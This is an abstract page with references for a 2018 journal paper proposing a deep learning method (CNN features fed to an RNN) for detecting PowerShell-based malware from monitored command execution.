Browse > Article
http://dx.doi.org/10.13089/JKIISC.2018.28.5.1197

PowerShell-based Malware Detection Method Using Command Execution Monitoring and Deep Learning  

Lee, Seung-Hyeon (Graduate School of Information Security, Korea University)
Moon, Jong-Sub (Graduate School of Information Security, Korea University)
Publication Information
Journal of the Korea Institute of Information Security & Cryptology / v.28, no.5, 2018 , pp. 1197-1207 More about this Journal
Abstract
PowerShell is command line shell and scripting language, built on the .NET framework, and it has several advantages as an attack tool, including built-in support for Windows, easy code concealment and persistence, and various pen-test frameworks. Accordingly, malwares using PowerShell are increasing rapidly, however, there is a limit to cope with the conventional malware detection technique. In this paper, we propose an improved monitoring method to observe commands executed in the PowerShell and a deep learning based malware classification model that extract features from commands using Convolutional Neural Network(CNN) and send them to Recurrent Neural Network(RNN) according to the order of execution. As a result of testing the proposed model with 5-fold cross validation using 1,916 PowerShell-based malwares collected at malware sharing site and 38,148 benign scripts disclosed by an obfuscation detection study, it shows that the model effectively detects malwares with about 97% True Positive Rate(TPR) and 1% False Positive Rate(FPR).
Keywords
PowerShell; malware; execution monitoring; deep learning;
Citations & Related Records
연도 인용수 순위
  • Reference
1 S. Albelwi and A. Mahmood, "A frame work for designing the architectures of deep convolutional neural networks," Entropy, vol. 19, no. 6, pp. 242-263, May 2017   DOI
2 D. Bohannon, "Invoke-obfuscation: powershell obfusk8tion techniques & how to (try to) d""etect 'th'+'em," DerbyCon, Sep. 2016
3 D. Bohannon and L. Holmes, "Revokeobfuscation: powershell obfuscation de tection and evasion using science," Blackhat USA, July 2017
4 F.A. Gers, J. Schmidhuber, and F. Cummins, "Learning to forget: continua l prediction with LSTM," 9th International Conference on Artificial Neural Networks, pp. 850-855, Sep. 1999
5 D. Hendler, S. Kels, and A. Rubin, "Detecting malicious powershell comman ds using deep neural networks," Proceedings of the 2018 on Asia Conference on Computer and Communications Security. ACM, pp. 187-197, June 2018
6 R. Kazanciyan and M. Hastings, "Investigating powershell attacks," BlackHat USA, Aug. 2014
7 D.P. Kingma and J.L. Ba, "Adam: a method for stochastic optimization," arXiv preprint arXiv:1412.6980v9, Jan. 2017
8 N. Mittal, "AMSI: how windows 10 plans to stop script-based attacks and how well it does it," Blackhat USA, Aug. 2016
9 V. Nair and G.E. Hinton, "Rectified linear units improve restricted boltzma nn machines," Proceedings of the 27th international conference on machine learning, pp. 807-814, June 2010
10 S.M. Pontiroli and F.R. Martinez, "The tao of .NET and powershell malware analysis," Virus Bulletin Conference, Sep. 2015
11 A. Rousseau, "Hijacking .NET to defend powershell," arXiv preprint arXiv:1709.07508, Sep. 2017
12 N. Srivastava, G. Hinton, A. Krizhevsky, I. Sutskever, and R. Salakhutdinov, "Dropout: a simple way to prevent neural networks from overfitting," The Journal of Machine Learning Research, vol. 15, no. 1, pp. 1929-1958, June 2014
13 S. Tanda, "Powershell inside out: applied .NET hacking for enhanced visibility," Code Blue, Nov. 2017
14 D. Tran, H. Mac, V. Tong, H.A. Tran, and L.G. Nguyen, "A LSTM based framework for handling multiclass imbalance in DGA botnet detection," Neurocomputing, vol. 275, pp. 2401-2413, Jan. 2018   DOI
15 McAfee, "McAfee labs threats report march 2018," McAfee, Mar. 2018
16 Microsoft, "Antimalware scan interface," https://docs.microsoft.com/en-us/windows/desktop/AMSI/antimalware-scan-interface-portal
17 Symantec, "Increased use of powershell in attacks," Symantec, 2016
18 https://aka.ms/PowerShellCorpus
19 FireEye, "Malicious powershell detection via machine learning," https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
20 Microsoft, "PowerShell," https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting
21 Microsoft, "Installing windows powershell," https://docs.microsoft.com/en-us/powershell/scripting/setup/installingwindows-powershell
22 Microsoft, "Script tracing and logging," https://docs.microsoft.com/en-us/powershell/wmf/5.0/audit_script
23 Palo Alto Networks, "Pulling back the curtains on encodedcommand powershell attacks," https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
24 GitHub, "DotNetHooking," https://github.com/tandasat/DotNetHooking